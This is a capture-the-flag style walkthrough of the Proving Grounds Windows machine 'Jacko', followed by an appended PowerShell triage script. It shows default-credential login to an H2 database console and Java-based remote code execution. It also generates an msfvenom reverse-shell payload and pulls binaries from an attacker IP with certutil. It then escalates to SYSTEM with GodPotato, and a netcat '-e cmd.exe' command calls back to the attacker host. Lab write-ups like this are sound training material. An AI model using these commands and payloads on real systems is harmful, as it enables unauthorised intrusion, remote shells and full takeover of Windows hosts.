Jacko

Source: Proving Grounds | OS: Windows | Community Rating: Hard

Enumeration & Reconnaissance

  • I started with the usual autorecon and was hit with a slew of open ports: 80, 135, 139, 445, 5040, 8082, 9092, 49664 -> 49669

  • I began with port 80 as usual, which presented an interface for the H2 Database Engine.

H2 Database Engine

Service Analysis

  • Checking online, I learned that the H2 Database Engine has multiple known vulnerabilities. Exploit-DB entry 49384 describes an exploit that allows running Java code. I tried several automated PoCs with no luck. I kept searching for the correct way to interact with the engine, and it wasn't until I checked port 8082 that I found the proper login page.

H2 Login Page

Gaining Initial Access

  • Using the default credentials, sa with an empty password, I was able to log in without issue.

  • Following the CVE details, I managed to run commands successfully.

RCE
  • However, when I attempted to upload my shell and get a reverse shell, nothing worked. I ended up reverting the machine over and over, and after a few frustrating hours away, the same commands worked on my return. OffSec servers, always keeping you on your toes.

  • I finally uploaded and executed my reverse shell using the following queries:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=9911  # generate the payload

-- Stage the payload on the target with certutil. JNIScriptEngine_eval is the alias the EDB 49384
-- exploit sets up; the string it receives is evaluated as Java-scripted code, so the Scanner
-- delimiter must be written "\\Z" (regex end-of-input) for the command output to be returned whole.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.170/shell.exe C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\\Z").next()');

-- Run it. This query blocks for as long as shell.exe keeps its stdout open, which is expected:
-- the reverse shell still connects back while the console is waiting.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\\Z").next()');
Reverse Shell

Privilege Escalation

  • When I started checking privileges, running commands like whoami failed with the error: 'whoami' is not recognized as an internal or external command, operable program or batch file.

Path Issue
  • After searching, I discovered that the %PATH% environment variable was missing some key defaults. The issue was fixed after running the following (note that set only changes the PATH of the current cmd process, so it has to be repeated in every new shell):

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
  • After that, checking privileges with whoami /priv confirmed I had SeImpersonatePrivilege, a huge relief that opened the door for escalation. I checked systeminfo and confirmed the system was Windows 10 x64, so I opted for GodPotato x64. I verified the .NET Framework version by running:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
  • which showed Version 4. Finally, I ran:

certutil -urlcache -split -f http://192.168.45.240/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.170 9101"
  • The first attempt failed for reasons I couldn't pinpoint, but running GodPotato a second time succeeded, and I obtained a SYSTEM shell.
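The steps above (repair PATH, confirm SeImpersonatePrivilege, check OS architecture and the installed .NET Framework, then pick the matching GodPotato build) can be collapsed into one triage script. The following is an added example written for this page, not code from the original write-up or from the GodPotato project. It assumes a cmd or PowerShell foothold on the Windows target, uses the attacker IP and listener port from the write-up as placeholders, and relies on the GodPotato release naming (GodPotato-NET2.exe, GodPotato-NET35.exe, GodPotato-NET4.exe); the download URL is an assumed placeholder.

```powershell
# Post-foothold triage for a Potato-style escalation (added example, not from the original post).
# Run with: powershell -ep bypass -File triage.ps1   (or paste into an interactive PowerShell).

# 1. Restore the default directories a stripped %PATH% is usually missing.
#    This only affects the current process, exactly like `set PATH=...` in cmd.
$defaults = @(
    "$env:SystemRoot\System32",
    "$env:SystemRoot",
    "$env:SystemRoot\System32\Wbem",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0"
)
$current = $env:Path -split ';'
foreach ($dir in $defaults) {
    if ($current -notcontains $dir) { $env:Path += ";$dir" }
}

# 2. Potato family prerequisite: the token must hold SeImpersonatePrivilege.
#    whoami /priv lists it even when the state column says Disabled, which is still sufficient.
$hasImpersonate = whoami /priv | Select-String -Pattern 'SeImpersonatePrivilege' -Quiet
if (-not $hasImpersonate) {
    Write-Warning 'SeImpersonatePrivilege not present; GodPotato/PrintSpoofer-style escalation will not work here.'
    return
}

# 3. OS architecture decides between the x64 and x86 binaries.
$arch = if ([Environment]::Is64BitOperatingSystem) { 'x64' } else { 'x86' }

# 4. GodPotato ships separate builds per .NET Framework; read the NDP keys like the reg query above.
$ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
$build = $null
if (Test-Path "$ndp\v4\Full") {
    $build = 'NET4'
} elseif ((Get-ItemProperty "$ndp\v3.5" -ErrorAction SilentlyContinue).Install -eq 1) {
    $build = 'NET35'
} elseif ((Get-ItemProperty "$ndp\v2.0.50727" -ErrorAction SilentlyContinue).Install -eq 1) {
    $build = 'NET2'
}
if (-not $build) {
    Write-Warning 'No usable .NET Framework found under NDP; GodPotato needs .NET 2.0, 3.5 or 4.x.'
    return
}

# 5. Print what to fetch and run. LHOST/LPORT come from the write-up; the URL is a placeholder.
$lhost = '192.168.45.170'      # attacker IP (placeholder from the write-up)
$lport = 9101                   # listener port (placeholder from the write-up)
$src   = "http://$lhost/GodPotato-$build.exe"   # assumed hosting URL, adjust to your setup
$exe   = "GodPotato-$build.exe"

"OS architecture : $arch"
"GodPotato build : $build"
"Fetch           : certutil -urlcache -split -f $src $exe"
"Escalate        : .\$exe -cmd `".\nc.exe -t -e C:\Windows\System32\cmd.exe $lhost $lport`""
```

The .NET check mirrors what GodPotato actually needs: the v4\Full subkey exists on any 4.x install, while the v3.5 and v2.0.50727 keys carry an Install DWORD, so the script falls back through the builds in the order a Windows 10 box is likely to have them.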

Privilege Escalation

Lessons Learned

  • H2 Interface Discovery: Checking alternate ports (like 8082) can reveal key interfaces that are not exposed on the default port, and saves a lot of wasted time.

  • Default Credentials: Always try the default credentials, here, sa with an empty password was all it took.

  • Persistence Pays Off: I don't know for this one, maybe hope that OffSec servers are having a good day?

  • Environment Variables: Ensure your %PATH% is correctly set to avoid command execution issues.

  • Privilege Escalation: Always check the privileges, Potatoes are awesome!
